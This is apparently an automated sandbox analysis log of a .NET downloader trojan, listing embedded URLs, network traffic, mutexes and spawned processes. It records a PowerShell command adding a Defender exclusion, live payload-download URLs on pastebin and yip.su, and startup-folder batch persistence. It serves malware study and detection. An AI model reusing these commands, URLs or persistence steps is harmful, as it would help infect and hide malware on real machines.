Source: MSBuild.exe, 00000007.00000002.4623253256.0000000002F71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://pastebin.com/raw/V6VJsrV3
Source: SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe, 00000000.00000002.2168250882.0000019C1E400000.00000004.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000007.00000002.4622227958.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://pastebin.com/raw/V6VJsrV31https://yip.su/RNWPd.exe7https://iplogger.com/1djqU4
Source: SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe	String found in binary or memory: https://sectigo.com/CPS0
Source: MSBuild.exe, 00000007.00000002.4623253256.00000000030B0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.cloudflare.com/5xx-error-landing
Source: MSBuild.exe, 00000007.00000002.4623253256.0000000003167000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.cloudflare.com/learning/access-management/phishing-attack/
Source: MSBuild.exe, 00000007.00000002.4623253256.0000000003041000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000007.00000002.4623253256.00000000030CC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://yip.su
Source: MSBuild.exe, 00000007.00000002.4623253256.00000000030D0000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000007.00000002.4623253256.00000000030F3000.00000004.00000800.00020000.00000000.sdmp, OpxuPHiFHgdrtftYca7HLIbc.exe.7.dr, RrubXdXqzbveJvxl1Tifb4PD.exe.7.dr, d6stDH4n7YYIgzL0Ov3IxLa8.exe.7.dr, FMT2OeifGUTNfkZyqLG0jeEO.exe.7.dr, cl3vhpdkLtmoLXWJKBugbJDP.exe.7.dr, eTNltv0LYVQnDdBl6tKVEYLr.exe.7.dr, Zu7wa3hTioo41CyobTIbG45C.exe.7.dr, sOj9v5fBDMPcMK0zpX2B6CYH.exe.7.dr, UzLdRf9lIFGRsFA8wLSHgzsn.exe.7.dr, oqEo8V5wvVLKNc2VytL8EAsq.exe.7.dr	String found in binary or memory: https://yip.su/RNWPd
Source: MSBuild.exe, 00000007.00000002.4623253256.0000000002F71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://yip.su/RNWPd.exe
Source: MSBuild.exe, 00000007.00000002.4623253256.00000000030D0000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000007.00000002.4623253256.0000000002FF4000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000007.00000002.4623253256.0000000002FAF000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000007.00000002.4623253256.00000000030F3000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000007.00000002.4623253256.0000000002FF8000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000007.00000002.4623253256.00000000030E3000.00000004.00000800.00020000.00000000.sdmp, OpxuPHiFHgdrtftYca7HLIbc.exe.7.dr, RrubXdXqzbveJvxl1Tifb4PD.exe.7.dr, d6stDH4n7YYIgzL0Ov3IxLa8.exe.7.dr, FMT2OeifGUTNfkZyqLG0jeEO.exe.7.dr, cl3vhpdkLtmoLXWJKBugbJDP.exe.7.dr, eTNltv0LYVQnDdBl6tKVEYLr.exe.7.dr, Zu7wa3hTioo41CyobTIbG45C.exe.7.dr, sOj9v5fBDMPcMK0zpX2B6CYH.exe.7.dr, UzLdRf9lIFGRsFA8wLSHgzsn.exe.7.dr, oqEo8V5wvVLKNc2VytL8EAsq.exe.7.dr	String found in binary or memory: https://yip.su/redirect-
Source: MSBuild.exe, 00000007.00000002.4623253256.0000000003041000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://yip.sudd

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 49672 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49789 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49800 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49781 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49795 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 49772 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49784 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49777 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49798 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown	Network traffic detected: HTTP traffic on port 49790 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723
Source: unknown	Network traffic detected: HTTP traffic on port 49674 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 49787 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49793 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49782 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49799
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49798
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49797
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49796
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49795
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49794
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49793
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49792
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49791
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49790
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49796 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49771 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49789
Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49788
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49787
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49786
Source: unknown	Network traffic detected: HTTP traffic on port 49779 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49785
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49784
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49783
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49782
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49781
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49780
Source: unknown	Network traffic detected: HTTP traffic on port 49785 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49776 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49799 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49791 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49779
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49778
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49777
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49776
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49775
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown	Network traffic detected: HTTP traffic on port 49788 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49780 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49794 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49802 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49773 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49802
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49801
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49800
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 49783 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49770 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49797 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49801 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 49778 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49786 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49775 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 49792 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745

Source: unknown	HTTPS traffic detected: 104.20.4.235:443 -> 192.168.2.6:49713 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49716 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.76.57:443 -> 192.168.2.6:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.20.4.235:443 -> 192.168.2.6:49735 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.20.4.235:443 -> 192.168.2.6:49740 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49796 version: TLS 1.2

Source: C:\Windows\System32\svchost.exe

File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe	Code function: 0_2_00007FF67DCDED80	0_2_00007FF67DCDED80
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe	Code function: 0_2_00007FF67DCE07D0	0_2_00007FF67DCE07D0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe	Code function: 0_2_00007FF67DCC91C0	0_2_00007FF67DCC91C0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe	Code function: 0_2_00007FF67DCDC3D0	0_2_00007FF67DCDC3D0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe	Code function: 0_2_00007FF67DCDDEA0	0_2_00007FF67DCDDEA0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe	Code function: 0_2_00007FF67DCDF5D0	0_2_00007FF67DCDF5D0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe	Code function: 0_2_00007FF67DCCE560	0_2_00007FF67DCCE560
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe	Code function: 0_2_00007FF67DCB8130	0_2_00007FF67DCB8130
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe	Code function: 0_2_00007FF67DCE3870	0_2_00007FF67DCE3870
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe	Code function: 0_2_00007FF67DCD0010	0_2_00007FF67DCD0010
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe	Code function: 0_2_00007FF67DCD8FB0	0_2_00007FF67DCD8FB0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe	Code function: 0_2_00007FF67DCD8B30	0_2_00007FF67DCD8B30
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe	Code function: 0_2_00007FF67DCD3280	0_2_00007FF67DCD3280
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe	Code function: 0_2_00007FF67DCE1A70	0_2_00007FF67DCE1A70
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe	Code function: 0_2_00007FF67DCCFA64	0_2_00007FF67DCCFA64
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe	Code function: 0_2_00007FF67DCE41E0	0_2_00007FF67DCE41E0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe	Code function: 0_2_00007FF67DCC3990	0_2_00007FF67DCC3990
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe	Code function: 0_2_00007FF67DCD8180	0_2_00007FF67DCD8180
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe	Code function: 0_2_00007FF67DD64980	0_2_00007FF67DD64980
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe	Code function: 0_2_00007FF67DCE2970	0_2_00007FF67DCE2970
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe	Code function: 0_2_00007FF67DCE2500	0_2_00007FF67DCE2500
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe	Code function: 0_2_00007FF67DCC2CD0	0_2_00007FF67DCC2CD0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe	Code function: 0_2_00007FF67DCC6C40	0_2_00007FF67DCC6C40
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe	Code function: 0_2_00007FF67DCE8C40	0_2_00007FF67DCE8C40

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe

Code function: String function: 00007FF67DCB9DD0 appears 51 times

Source: SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe

Static PE information: invalid certificate

Source: SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe	Binary or memory string: OriginalFilename vs SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe
Source: SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe, 00000000.00000000.2141990225.00007FF67DF37000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameIsSuffixIsOddInteger.dllJ vs SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe
Source: SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe, 00000000.00000002.2167534405.0000019C1C000000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameIsSuffixIsOddInteger.dllJ vs SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe
Source: SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe, 00000000.00000002.2168250882.0000019C1E400000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameIsSuffixIsOddInteger.dllJ vs SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe
Source: SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe, 00000000.00000002.2168250882.0000019C1E400000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameNew.exe" vs SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe
Source: SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe	Binary or memory string: OriginalFilenameIsSuffixIsOddInteger.dllJ vs SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe

Source: classification engine

Classification label: mal100.troj.expl.evad.winEXE@87/26@4/4

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe

Code function: 0_2_00007FF67DCC2B00 LookupPrivilegeValueW,GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,GetLastError,CloseHandle,GetLargePageMinimum,VirtualAlloc,GetCurrentProcess,VirtualAllocExNuma,

0_2_00007FF67DCC2B00

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

File created: C:\Users\user\AppData\Local\oqEo8V5wvVLKNc2VytL8EAsq.exe

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6104:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3744:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7036:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5096:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3184:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6456:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5088:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3180:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5180:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5660:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4824:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7956:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2448:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2748:120:WilError_03
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6292:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3108:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5972:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:972:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6368:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7588:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7888:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8064:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5228:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5476:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:612:120:WilError_03

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_owwvgjly.hoh.ps1

Jump to behavior

Source: unknown

Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Q0yFl4HZQFpr4zRkESdCNqpF.bat" "

Source: SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe

Static file information: TRID: Win64 Executable GUI Net Framework (217006/5) 45.39%

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe

ReversingLabs: Detection: 60%

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe

File read: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:UserProfile
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: unknown	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Q0yFl4HZQFpr4zRkESdCNqpF.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ATW4YMuey528R5HSnE54AwE5.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HmybwgSSguRbNIGR4y7xNho1.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\3KsdkaRiL7RacJah2YobpSxj.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\u0RvkxN9wEthGCCLh4tn7zqU.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
